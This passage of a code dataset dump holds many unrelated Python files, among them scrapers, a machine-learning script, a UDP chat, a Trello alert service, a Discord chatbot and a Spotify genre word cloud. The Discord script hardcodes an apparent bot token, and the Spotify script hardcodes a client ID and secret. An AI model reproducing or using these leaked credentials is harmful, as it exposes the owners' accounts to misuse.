radius):\n    click.echo('center: %s, radius: %s' % (center, radius))\n\ncircle()","sub_path":"nargs.py","file_name":"nargs.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"265974157","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\nimport os\nfrom urllib import request\nfrom scrapy.exceptions import DropItem\n\nclass DoubanMiviePipeline(object):\n    def process_item(self, item, spider):\n        \"\"\" test the pipeline function\n        print(\"in pipelines:\")\n        print(item['img'])\n        \"\"\"\n        if item['name']:\n            filepath = 'movies/' + item['name']\n            if not os.path.exists(filepath):\n                os.makedirs(filepath)\n\n            if filepath:\n                self.create_readme(item, filepath)\n                self.download_image(item['img'], filepath)\n                return item\n            else:\n                raise DropItem(\"write file path doesn't exist...\")\n\n\n    def download_image(self, img_url, filepath):\n        url = \"\".join(img_url)\n        print(url)\n        img_filename = filepath + '/' + url.split('/')[-1]\n        with open(img_filename, 'wb') as f:\n            f.write(request.urlopen(url).read())\n\n    def create_readme(self, item, filepath):\n        filename = filepath + '/' + 'Readme.txt'\n        with open(filename, 'w', encoding = 'utf-8') as f:\n            f.write(\"电影名称:%s\\n\" % item['name'])\n            f.write(\"评分:%s\\n\" % item['score'])\n            f.write(\"导演:%s\\n\" % item['director'])\n            f.write(\"编剧: %s\\n\" % item['scriptwriter'])\n            f.write(\"主演: %s\\n\" % item['lead_actor'])\n            f.write(\"类型: %s\\n\" % item['type'])\n            f.write(\"官方网站: %s\\n\" % item['offcialSite'])\n            f.write(\"制片国家/地区: %s\\n\" % item['productAddress'])\n            f.write(\"语言: %s\\n\" % item['language'])\n            f.write(\"上映日期: %s\\n\" % item['initialReleaseDate'])\n            f.write(\"片长: %s\\n\" % item['runtime'])\n            f.write(\"别名: %s\\n\" % item['aliasName'])\n            f.write(\"IMDb链接: %s\\n\" % item['IMDBAddress'])\n            f.write(\"简介: %s\\n\" % item['brief_info'])","sub_path":"myscrapy/test/douban_mivie/douban_mivie/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":2031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"581183481","text":"import requests\nfrom bs4 import BeautifulSoup\n\nurl = \"https://comic.naver.com/webtoon/weekdayList.nhn?week=tue\"\n\nreq = requests.get(url)\n\nprint(req)\t\t # get simply fetches only the response (status) code.\n\nhtml = req.text\t # We take .text to get the html content. 
If the encoding does not match, you can change the encoding method or use .content instead.\n\n# print(html)\n\nsoup = BeautifulSoup(html, 'html.parser')\nresult = soup.select('.thumb')\n\nprint(result)","sub_path":"pythonEx/day2/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"444150111","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pylab as plt\nfrom sklearn.linear_model import LogisticRegression\n\ndatos=pd.read_csv(\"Default.csv\")\n'''\n#print(datos[\"default\"]==\"Yes\")\na =np.array(datos[\"default\"]==\"Yes\")\nBalance_y,Income_y= np.array(datos[\"balance\"]),np.array(datos[\"income\"])\nBalance_y,Income_y=Balance_y[a],Income_y[a]\na =np.array(datos[\"default\"]==\"No\")\nBalance_n,Income_n= np.array(datos[\"balance\"]),np.array(datos[\"income\"])\nBalance_n,Income_n=Balance_n[a],Income_n[a]\n# plt.plot(Balance_n,Income_n,marker=\"x\",color=\"orangered\")\n# plt.plot(Balance_y,Income_y,marker=\"+\",color=\"navy\")\nplt.plot(Balance_y,Income_y,\"xb\")\nplt.plot(Balance_n,Income_n,\"+r\")\nplt.show()\ndatos.boxplot(column='balance', by=\"default\")\nplt.show()\ndatos.boxplot(column='income', by=\"default\")\nplt.show()\n'''\nX, Y =np.array( datos[\"balance\"].values.reshape(-1,1)),np.array(datos[\"default\"])\nclf = LogisticRegression(random_state=0, solver='lbfgs').fit(X,Y)\nprob=clf.predict_proba(X)\ncoef=clf.coef_\ninter=clf.intercept_\nprint(coef,inter)\n# ---------------------- Use this ------------------\na= np.array(datos[\"student\"]==\"Yes\")\nStudent_y=np.ones(len(datos[\"student\"]))\nStudent_y[~a]=0\nStudent_y = Student_y.reshape(-1,1)\nclf_2 = LogisticRegression(random_state=0, solver='lbfgs').fit(Student_y,Y)\nprob=clf_2.predict(Student_y)\ncoef=clf_2.coef_\ninter=clf_2.intercept_\nprint(coef,inter)\n# -------------------------------------------\n'''\na= np.array(datos[\"student\"]==\"Yes\")\nStudent_y=np.ones(len(datos[\"student\"]))\nStudent_y=Student_y[a]\ng = datos[\"default\"].values[a]\n# Student = np.ones(len(datos[\"student\"]))\n# Student[~a]=0\nStudent_y = Student_y.reshape(-1,1)\nclf_2 = LogisticRegression(random_state=0, solver='lbfgs').fit(Student_y,g)\ncoef=clf_2.coef_\ninter=clf_2.intercept_\nprint(coef,inter)\n'''\n\n'''\nplt.scatter(datos[\"balance\"],prob[:,1])\nplt.show()\n# plt.scatter(datos[\"balance\"].values,prob[:,0])\n# plt.show()\n'''\n# a= np.array(datos[\"student\"]==\"Yes\")\n# Student_y=np.ones(len(datos[\"student\"]))\n# Student_y[~a]=0\n# Student_y = Student_y.reshape(-1,1)\nX= np.array(datos[[\"balance\",\"income\"]])\nX = np.append(X,Student_y,axis=1)\nclf_3 = LogisticRegression(random_state=0, solver='lbfgs',multi_class='multinomial').fit(X,Y)\nprob=clf_3.predict(X)\ncoef=clf_3.coef_\ninter=clf_3.intercept_\nprint(coef,inter)\n","sub_path":"Otros Codigos/Default_model.py","file_name":"Default_model.py","file_ext":"py","file_size_in_byte":2310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"233043316","text":"from openpyxl import load_workbook\nfrom concepts import Context\nimport os\nimport csv\nimport re\n\n\ndef build_lattice(filename):\n    filecsv = 'dataset.csv'\n    attributes, cells = load_attributes_object(filename)\n    create_csv_file(filecsv, attributes, cells)\n    create_lattice_file(filecsv, filename)\n\n    print('Lattice built.')\n\n\ndef load_attributes_object(filename):\n    workbook = load_workbook(filename)\n    worksheet = workbook['Foglio1']\n\n    dimension = 
worksheet.calculate_dimension()\n    final_object_cell = re.split(':', dimension)[1]\n    final_attribute_cell = re.findall('[A-Z]+', final_object_cell)[0] + '1'\n\n    attributes = worksheet['A1':final_attribute_cell]\n    cells = worksheet['A2':final_object_cell]\n\n    return attributes, cells\n\n\ndef create_csv_file(filecsv, attributes, cells):\n    row_list, l = [], []\n\n    for attr in attributes[0]:\n        l.append(attr.value)\n\n    row_list.append(l)\n\n    for row in cells:\n        l = []\n        l.append(row[0].value)\n        for i in range(1, len(row)):\n            l.append('X') if str(row[i].value) == '1' else l.append('')\n        row_list.append(l)\n\n    with open(filecsv, 'w', newline='') as file:\n        writer = csv.writer(file)\n        writer.writerows(row_list)\n\n\ndef create_lattice_file(filecsv, filename):\n    lat = Context.fromfile(filecsv, frmat='csv').lattice\n    os.remove(filecsv)\n\n    path = '/data/lattices'\n    filename = path + '/' + filename.replace('.xlsx', '.txt')  # join with a separator so the file lands inside the folder\n\n    with open(filename, 'w') as fp:\n        fp.write(str(lat))\n\n    # View lattice like a graph\n    # c.graphviz(filename=\"exampleLattice\",view=True)\n    # print('Lattice graph created')\n","sub_path":"Formal Concept Analysis (FCA)/FCA Demo/lattice.py","file_name":"lattice.py","file_ext":"py","file_size_in_byte":1641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"432271017","text":"# !/usr/bin/env python\n# -*- coding: utf-8 -*\n'''\ncreated by will \n'''\n\nfrom metamap.models import TblBlood\n\ndef clean_blood(blood, current=0):\n    '''\n    To make the mermaid rendering easier, replace @ in blood with __\n    :param blood:\n    :return:\n    '''\n    blood.parentTbl = blood.parentTbl.replace('@', '__')\n    blood.tblName = blood.tblName.replace('@', '__')\n    if current > 0:\n        blood.tblName += ';style ' + blood.tblName.replace('@', '__') + ' fill:#f9f,stroke:#333,stroke-width:4px'\n    return blood\n\ndef find_parent_mermaid(blood, final_bloods, current=0):\n    '''\n    # Walk the parent nodes of the current node recursively\n    :param blood:\n    :param final_bloods:\n    :return:\n    '''\n    bloods = TblBlood.objects.filter(tblName=blood.parentTbl)\n    if bloods.count() > 0:\n        for bld in bloods:\n            final_bloods.add(clean_blood(bld, current))\n            find_parent_mermaid(bld, final_bloods)\n\n\ndef find_child_mermaid(blood, final_bloods, current=0):\n    '''\n    Walk the child nodes of the current node recursively\n    :param blood:\n    :param final_bloods:\n    :return:\n    '''\n    bloods = TblBlood.objects.filter(parentTbl=blood.tblName)\n    if bloods.count() > 0:\n        for bld in bloods:\n            final_bloods.add(clean_blood(bld, current))\n            find_child_mermaid(bld, final_bloods)  # was find_parent_mermaid: child traversal must recurse into children\n","sub_path":"metamap_django/metamap/helpers/bloodhelper.py","file_name":"bloodhelper.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"344800179","text":"# -*- coding: utf-8 -*-\r\n# Copyright (c) 2015-2016, Exa Analytics Development Team\r\n# Distributed under the terms of the Apache License 2.0\r\n\"\"\"\r\nRepeat\r\n############################\r\nFunctions for repeating arrays of varying dimensions.\r\n\"\"\"\r\nimport numpy as np\r\nfrom exa._config import config\r\n\r\n\r\ndef repeat_count(array, n):\r\n    \"\"\"\r\n    Repeat each element of an array n times.\r\n    \"\"\"\r\n    pass\r\n\r\n\r\ndef repeat_counts_f8_1d(array, counts):\r\n    \"\"\"\r\n    Repeat each element of an array n times (with variable n).\r\n    \"\"\"\r\n    m = len(array)\r\n    nn = np.sum(counts)\r\n    repeated = np.empty((nn, ), dtype=np.float64)\r\n    h = 0\r\n    for i in range(m):\r\n        count = counts[i]\r\n        record = array[i]\r\n        for j in range(count):\r\n            repeated[h] = record\r\n            h += 1\r\n    
return repeated\r\n\r\n\r\ndef repeat_counts_f8_2d(array, counts):\r\n \"\"\"\r\n Repeat each element of an array n times (with variable n).\r\n \"\"\"\r\n m, n = array.shape\r\n nn = np.sum(counts)\r\n repeated = np.empty((nn, n), dtype=np.float64)\r\n h = 0\r\n for i in range(m):\r\n count = counts[i]\r\n record = array[i]\r\n for j in range(count):\r\n repeated[h] = record\r\n h += 1\r\n return repeated\r\n\r\n\r\nif config['dynamic']['numba'] == 'true':\r\n from numba import jit\r\n repeat_counts_f8_1d = jit(nopython=True, cache=True, nogil=True)(repeat_counts_f8_1d)\r\n repeat_counts_f8_2d = jit(nopython=True, cache=True, nogil=True)(repeat_counts_f8_2d)\r\n","sub_path":"exa/math/misc/repeat.py","file_name":"repeat.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"212437373","text":"import socket \nimport os\nfrom threading import *\n\nos.system(\"tput setaf 7\")\ndef sender(server_ip,server_port):\n s = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)\n name = input(\"\\n\\t\\ttype your name : \")\n print(f\"\\t\\tWelcome to chat room {name} (to quit type : q)\")\n while True :\n data = input(\"\\t\\tmsg : \") \n data = f\"{name} : \" + data\n #print(\"\\t\\t\",data)\n s.sendto(data.encode(),(server_ip,server_port))\n\ndef reciever(ip,port):\n s = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)\n s.bind((ip,port))\n while True:\n data = s.recvfrom(1024)\n print(\"\\t\\t\",data[0].decode())\n \nserver_ip = \"192.168.99.1\"\nserver_port = 2222\n\nip = \"192.168.56.101\"\nport = 2222\n\nThread(target=sender,args=(server_ip,server_port)).start()\nThread(target=reciever,args=(ip,port)).start()\n\n","sub_path":"linchat.py","file_name":"linchat.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"646731808","text":"\n\n\n\n\n\nclass Permissions():\n permission_allow_button_id=None #Global variable\n permission_deny_button_id = None\n\n def __init__(self,driver): #constructor\n self.driver=driver #variables for locators\n self.permission_allow_button_id=\"com.android.packageinstaller:id/permission_allow_button\" #Local variable\n self.permission_deny_button_id=\"com.android.packageinstaller:id/permission_deny_button\"\n\n def launch_deny_permission(self):\n self.driver.reset()\n self.driver.find_element_by_id(self.permission_allow_button_id).click()\n self.driver.find_element_by_id(self.permission_deny_button_id).click()\n self.driver.launch_app()\n\n def deny_permission(self):\n self.driver.reset()\n self.driver.find_element_by_id(self.permission_deny_button_id).click()\n self.driver.find_element_by_id(self.permission_allow_button_id).click()\n self.driver.launch_app()\n\n def launch_permission(self): #actions/functions for locators\n self.driver.reset()\n self.driver.find_element_by_id(self.permission_allow_button_id).click() # Replace element locators with variable\n self.driver.find_element_by_id(self.permission_allow_button_id).click()\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"k12learningapp/automationproject/Pages/permissions.py","file_name":"permissions.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"210812887","text":"import csv\nz = {3.0,4,5}\na = [str(int(item)) for item in z]\nprint(a[0])\nprint(a[1])\nprint(a)\n\nwriter = csv.writer(open('pr1.csv','w'),delimiter = 
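# --- The repeat.py record above implements variable-count repetition by hand (the loop
# is later numba-jit compiled). For reference, NumPy expresses the same operation
# directly; a tiny demonstration with illustrative data:
import numpy as np

array = np.array([1.0, 2.0, 3.0])
counts = np.array([2, 0, 3])
print(np.repeat(array, counts))  # [1. 1. 3. 3. 3.] -- same result as repeat_counts_f8_1d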
',',quoting=csv.QUOTE_NONNUMERIC, lineterminator='\\n')\nfor i in range(0,1):\n writer.writerow(['ImageId','Label'])\nfor i in range(1,9):\n writer.writerow([a[1],\"Tek\"])\n\n\n","sub_path":"2015-2016/SVM/writetosvc.py","file_name":"writetosvc.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"97683073","text":"class Solution:\n def findMin(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n low, high = 0, len(nums) - 1\n while low <= high:\n mid = (low + high) // 2\n if nums[low] <= nums[mid]:\n if nums[mid] <= nums[high]:\n high -= 1\n else:\n low = mid + 1\n else:\n if nums[mid] <= nums[high]:\n high = mid\n\n return nums[low]\n\nif __name__ == \"__main__\":\n nums = [1,3,5]\n print(Solution().findMin(nums))","sub_path":"src/0154-Find-Minimum-in-Rotated-Sorted-Array-II/0154.py","file_name":"0154.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"253476671","text":"from lifetimeServer import handlerHelper\nfrom trelloNotifier import TrelloNotifier\nimport os, sys, logging, coloredlogs\nfrom logging.handlers import RotatingFileHandler\nfrom datetime import datetime\n\n\nclass FarmWatcher:\n\n _TrelloNotifier = None\n trello_admins = []\n post_issue_after = None\n\n _farms = []\n _last_alive_time = []\n _farms_ip = []\n\n config_path = \"\"\n local_path = os.path.dirname(os.path.abspath(sys.argv[0]))\n\n def __init__(self, config_path):\n try:\n coloredlogs.install(level='DEBUG')\n logging.getLogger('').addHandler(RotatingFileHandler(\n os.path.dirname(os.path.abspath(sys.argv[0])) + '/farmWatcher.log', maxBytes=(1048576*5), backupCount=7))\n\n self.config_path = config_path\n\n logging.info(\"Connecting to Trello...\")\n self._TrelloNotifier = \\\n TrelloNotifier(key=self._get_var(\"TRELLO_API_KEY\", is_required=True),\n token=self._get_var(\"TRELLO_API_TOKEN\", is_required=True))\n self.trello_admins = self._get_var(\"TRELLO_ADMINS\", is_required=True).split(',')\n self.post_issue_after = self._get_var(\"POST_ISSUE_AFTER\", is_required=True)\n\n handlerHelper.set_watcher(self)\n handlerHelper.start_server(self._get_var(\"SERVER_IP\", is_required=True),\n self._get_var(\"SERVER_PORT\", is_required=True))\n\n except Exception as e:\n logging.critical(e)\n raise e\n\n def _get_var(self, var, is_required=False):\n try:\n file = open(self.config_path, 'r')\n for line in file:\n if not line.count('#') and line.count('='):\n cfgvars = line.split('=')\n varname = cfgvars[0].strip()\n value = cfgvars[1].strip()\n if value in ('True','False'):\n value = value == 'True'\n elif not value.count('\"'):\n value = int(value)\n else:\n value = value.replace('\"','')\n if var == varname:\n file.close()\n return value\n file.close()\n\n except Exception as e:\n raise e\n\n if not is_required:\n logging.info(\"Variable \" + str(var) + \" not found in config file!\")\n return None\n else:\n raise Exception(\"Variable \" + str(var) + \" must be in config file!\")\n\n def update_farm(self, name, ip):\n if not name or not ip:\n raise Exception(\"IP and name of farm is needed!\")\n\n if name not in self._farms:\n self._farms.append(name)\n self._farms_ip.append(\"\")\n self._last_alive_time.append(datetime.now())\n\n try:\n farm_id = self._farms.index(name)\n self._farms_ip[farm_id] = ip\n self._last_alive_time[farm_id] = datetime.now()\n\n except Exception as e:\n logging.error(e)\n raise e\n\n 
return True\n\n def farm_list(self):\n farms = []\n for id, farm in enumerate(self._farms):\n farm_info = {}\n farm_info[\"name\"] = farm\n farm_info[\"ip\"] = self._farms_ip[id]\n farm_info[\"last_alive_time\"] = self._last_alive_time[id]\n farms.append(farm_info)\n\n return farms\n\n def check_farms(self):\n for farm_id, last_time in enumerate(self._last_alive_time):\n try:\n if (datetime.now() - last_time).total_seconds() > self.post_issue_after:\n issue = self._TrelloNotifier.issue(\"\", self._farms[farm_id],\n description=\"Last alive time \" +\n datetime.strftime(last_time, \"%Y.%m.%d %H:%M\"),\n label_color=\"red\")\n for name in self.trello_admins:\n try:\n issue.assign(self._TrelloNotifier.member(name).id)\n except Exception as e:\n pass\n\n except Exception as e:\n logging.error(e)\n\n\nmy_watcher = FarmWatcher(os.path.dirname(os.path.abspath(sys.argv[0])) + '/farmWatcher.conf')\nimport time\n\nwhile True:\n my_watcher.check_farms()\n time.sleep(10)","sub_path":"farmWatcher.py","file_name":"farmWatcher.py","file_ext":"py","file_size_in_byte":4489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"251918109","text":"#!/bin/env python\n# coding:utf-8\n\n# http://qiita.com/ynakayama/items/05ab9ab9b7c579894bd7\n\nimport os\nimport MeCab\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nimport re\n\nhome = os.path.expanduser('../../data')\ntarget_dir = os.path.join(home, 'cao')\ntoken_dict = {}\n\ndef tokenize(text):\n \"\"\" MeCab で分かち書きした結果をトークンとして返す \"\"\"\n wakati = MeCab.Tagger(\"-O wakati\")\n return wakati.parse(text)\n\n# ひとつひとつファイルを読み込んで\n# ファイル名に対して語彙群のディクショナリを生成する\nfor subdir, dirs, files in os.walk(target_dir):\n for file in files:\n if re.match(\"^.*conv$\",file) is None:\n continue\n file_path = os.path.join(subdir, file)\n shakes = open(file_path, 'r')\n text = shakes.read()\n lowers = text.lower()\n token_dict[file] = tokenize(lowers)\n\n# scikit-learn の TF-IDF ベクタライザーを使う\n#tfidf = TfidfVectorizer(tokenizer=tokenize, stop_words='english')\n#tmp=token_dict.values()\n#tfs = tfidf.fit_transform(token_dict.values())\n\nprint(token_dict)\n#print(tfs.toarray())\n","sub_path":"cao/12_tfidf.py","file_name":"12_tfidf.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"465502446","text":"# Copyright 2020 Huawei Technologies Co., Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\n\"\"\" test_embedding \"\"\"\nimport numpy as np\n\nfrom mindspore import Tensor\nfrom mindspore import dtype as mstype\nfrom mindspore.model_zoo.Bert_NEZHA import EmbeddingLookup, EmbeddingPostprocessor\nfrom ..ut_filter import non_graph_engine\n\n\n@non_graph_engine\ndef test_check_embedding_lookup_1():\n m = EmbeddingLookup(vocab_size=32000,\n embedding_size=768,\n embedding_shape=[1, 128, 768],\n use_one_hot_embeddings=False)\n m(Tensor(np.ones([128]), 
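# --- The 12_tfidf.py record above builds token_dict but leaves the scikit-learn step
# commented out. A minimal sketch of how that step is typically wired up, with a toy
# corpus standing in for the MeCab-tokenized documents (an assumption, not the original):
from sklearn.feature_extraction.text import TfidfVectorizer

token_dict = {'a.conv': 'nerve growth factor', 'b.conv': 'nerve fiber density'}
tfidf = TfidfVectorizer()  # the record would also pass tokenizer=tokenize
tfs = tfidf.fit_transform(token_dict.values())
print(tfs.toarray().shape)  # (n_documents, n_terms)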
mstype.int32))\n\n\n@non_graph_engine\ndef test_check_embedding_lookup_2():\n    m = EmbeddingLookup(vocab_size=32000,\n                        embedding_size=768,\n                        embedding_shape=[1, 128, 768],\n                        use_one_hot_embeddings=True)\n    m(Tensor(np.ones([128]), mstype.int32))\n\n\n@non_graph_engine\ndef test_check_embedding_lookup_3():\n    m = EmbeddingLookup(vocab_size=32000,\n                        embedding_size=768,\n                        embedding_shape=[1, 128, 768],\n                        use_one_hot_embeddings=True,\n                        initializer_range=0.01)\n    m(Tensor(np.ones([128]), mstype.int32))\n\n\n@non_graph_engine\ndef test_embedding_post_1():\n    m = EmbeddingPostprocessor(embedding_size=768,\n                               embedding_shape=[1, 128, 768],\n                               use_token_type=True)\n    m(Tensor(np.ones([128]), mstype.int32), Tensor(np.ones([1, 128, 768]), mstype.float32))\n\n\n@non_graph_engine\ndef test_embedding_post_2():\n    m = EmbeddingPostprocessor(embedding_size=768,\n                               embedding_shape=[1, 128, 768],\n                               use_token_type=True,\n                               initializer_range=0.3)\n    m(Tensor(np.ones([128]), mstype.int32), Tensor(np.ones([1, 128, 768]), mstype.float32))\n","sub_path":"tests/ut/python/nn/test_embedding.py","file_name":"test_embedding.py","file_ext":"py","file_size_in_byte":2501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"262905070","text":"\"\"\"\r\nIntersection: Given two singly linked lists, determine if the two lists intersect. Return the intersecting node. Note that the intersection is defined based on reference not value. That is, if the kth node of the first linked list is the exact same node (by reference) as the jth node of the second linked list, then they are intersecting.\r\n\"\"\"\r\n\r\nfrom lib.single_linked_list import *\r\n\r\ndef intersection(head1, head2):\r\n\tl1_data = tail_and_size(head1)\r\n\tl2_data = tail_and_size(head2)\r\n\tsize_1 = l1_data[0]\r\n\ttail_1 = l1_data[1]\r\n\tsize_2 = l2_data[0]\r\n\ttail_2 = l2_data[1]\r\n\r\n\tif tail_1 != tail_2:\r\n\t\treturn None\r\n\tif size_1 < size_2:\r\n\t\tptr_2 = move_ptr(head2, size_2 - size_1)\r\n\t\tptr_1 = head1\r\n\t\treturn get_intersect(ptr_1, ptr_2)\r\n\telif size_2 < size_1:\r\n\t\tptr_1 = move_ptr(head1, size_1 - size_2)\r\n\t\tptr_2 = head2\r\n\t\treturn get_intersect(ptr_1, ptr_2)\r\n\telse:\r\n\t\treturn get_intersect(head1, head2)  # equal lengths: start from both heads (ptr_1/ptr_2 were never set in this branch)\r\n\r\ndef tail_and_size(head):\r\n\tptr = head\r\n\tsize = 1\r\n\twhile ptr.next is not None:\r\n\t\tptr = ptr.next\r\n\t\tsize += 1\r\n\treturn (size, ptr)\r\n\r\ndef move_ptr(head, diff):\r\n\tptr = head\r\n\twhile diff > 0:\r\n\t\tptr = ptr.next\r\n\t\tdiff -= 1\r\n\treturn ptr\r\n\r\ndef get_intersect(head1, head2):\r\n\tptr1 = head1\r\n\tptr2 = head2\r\n\twhile ptr1 is not None and ptr2 is not None:\r\n\t\tif ptr1 is ptr2:  # identity check, per the reference-based definition above\r\n\t\t\treturn ptr1\r\n\t\tptr1 = ptr1.next\r\n\t\tptr2 = ptr2.next\r\n\treturn None\r\n\r\n\r\n\r\ndef main():\r\n\tlist_1 = singly_linked_list()\r\n\tlist_1.insert_tail(3)\r\n\tlist_1.insert_tail(1)\r\n\tlist_1.insert_tail(5)\r\n\tlist_1.insert_tail(9)\r\n\tlist_1.insert_tail(7)\r\n\tlist_1.insert_tail(2)\r\n\tlist_1.insert_tail(1)\r\n\r\n\tintersect = list_1.search(7)\r\n\r\n\tlist_2 = singly_linked_list()\r\n\tlist_2.insert_tail(4)\r\n\tlist_2.insert_tail(6)\r\n\tlist_2.insert_node(intersect)\r\n\tresult = intersection(list_1.head, list_2.head)\r\n\tif result:\r\n\t\tprint(\"List Intersect is: {}\".format(result.data))\r\n\telse:\r\n\t\tprint(\"List Intersect is: {}\".format(result))\r\n\r\n\r\n \r\nif __name__ == 
'__main__':\r\n\tmain()\r\n\r\n","sub_path":"ctci/ch2/7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"179056335","text":"d = {\r\n \"Алексеев\":[13000,\"male\"],\r\n \"Горбачёва\":[14000,\"female\"],\r\n \"Осипов\":[15000,\"male\"],\r\n \"Илясова\":[9000,\"female\"],\r\n \"Маслов\":[24000,\"male\"],\r\n \"Авдеева\":[18000,\"female\"],\r\n \"Куликов\":[7000,\"male\"],\r\n \"Борисова\":[25000,\"female\"],\r\n \"Сафонов\":[200000,'male'],\r\n \"Волкова\":[17000,'female'],\r\n }\r\nfor gon in sorted(d.items(),key=lambda para:para[1]):\r\n if gon[1][1] == \"male\":\r\n print(gon)\r\n\r\n","sub_path":"LR_18.py","file_name":"LR_18.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"364929448","text":"import discord\r\nimport asyncio\r\nimport urllib.request\r\n\r\nclient = discord.Client()\r\n\r\n@client.event\r\nasync def on_ready():\r\n print('Logged in as')\r\n print(client.user.name)\r\n print(client.user.id)\r\n print('------')\r\n\r\n@client.event\r\nasync def on_message(message):\r\n\tif message.channel.id == \"513425150927044648\":\r\n\t if message.content.startswith(client.user.mention+\" \"):\r\n\t fp = urllib.request.urlopen(\"http://miceclan.com/api/cb/input?k=sam2&i=\"+urllib.parse.quote(message.content[len(client.user.mention)+1:]))\r\n\t mybytes = fp.read()\r\n\t mystr = mybytes.decode(\"utf8\")\r\n\t fp.close()\r\n\t await client.send_message(message.channel, str(message.author.mention)+\", \"+str(mystr))\r\n\r\nclient.run('NTEzNDIzMjY1ODg1MTkyMjAy.DtHydQ.Nwl4iQzIZP5Q6RdQTzegd2sV4uE')","sub_path":"Luffy.py","file_name":"Luffy.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"632831209","text":"import matplotlib.pyplot as plt\nimport numpy\nfrom wordcloud import WordCloud, STOPWORDS, ImageColorGenerator\nimport spotipy\nfrom spotipy.oauth2 import SpotifyClientCredentials\nfrom spotipy.oauth2 import SpotifyOAuth\nimport requests\nimport base64\nimport pandas as pd\nfrom bs4 import BeautifulSoup\nimport urllib.request\nimport re\n#Talal Brek's Contribution\nusername = '22kx7zq2hwaxl66q3uqjwc2zq'\nCLIENT_ID = 'f238edd5fc9e4d1a9f074ee91f9fe017'\nCLIENT_SECRET = 'b84ff4eee3ef4199b78c734f39624fcc'\nscope = \"user-library-read\"\ntop_200 = pd.read_csv(\"US_Top200_10-10-2020.csv\")\ngenres = dict()\ngenre_list = list()\ngenres['RAP'] = 0\ngenres['OTHER'] =0\n\n\n\n\"\"\"\n\n\"\"\"\ntop_200_artists = top_200['Artist']\n\nsp = spotipy.Spotify(auth_manager=SpotifyOAuth('f238edd5fc9e4d1a9f074ee91f9fe017','b84ff4eee3ef4199b78c734f39624fcc',scope=scope,redirect_uri = 'https://www.spotify.com/us/account/overview/'))\n\ntop_200_artists = top_200['Artist']\nfor i in top_200_artists:\n artist = sp.search(q = i, type ='artist')\n genre_str = ''\n for genre in artist['artists']['items'][0]['genres']:\n genre_str += genre\n genre_list.append(genre)\n if 'rap' in genre_str:\n genres['RAP'] +=1\n \n else:\n genres['OTHER'] += 1\n artist_list = i.split(' ')\n \n \n\n \n\n \n \nprint(genres)\nprint(genre_list)\nwordcloud_string = ''\n\nwordcloud = WordCloud(width=1600, height=800, max_font_size=200, background_color=\"black\").generate(str(genre_list))\n # plt the image generated by WordCloud 
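# --- The intersection record above aligns the longer list before walking in lockstep.
# A common O(1)-space alternative (not in the original) swaps heads when a pointer runs
# off the end; both pointers then meet at the intersection node, or together at None:
def intersection_two_pointer(head1, head2):
    p1, p2 = head1, head2
    while p1 is not p2:
        p1 = p1.next if p1 is not None else head2
        p2 = p2.next if p2 is not None else head1
    return p1  # the shared node, or None if the lists never intersect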
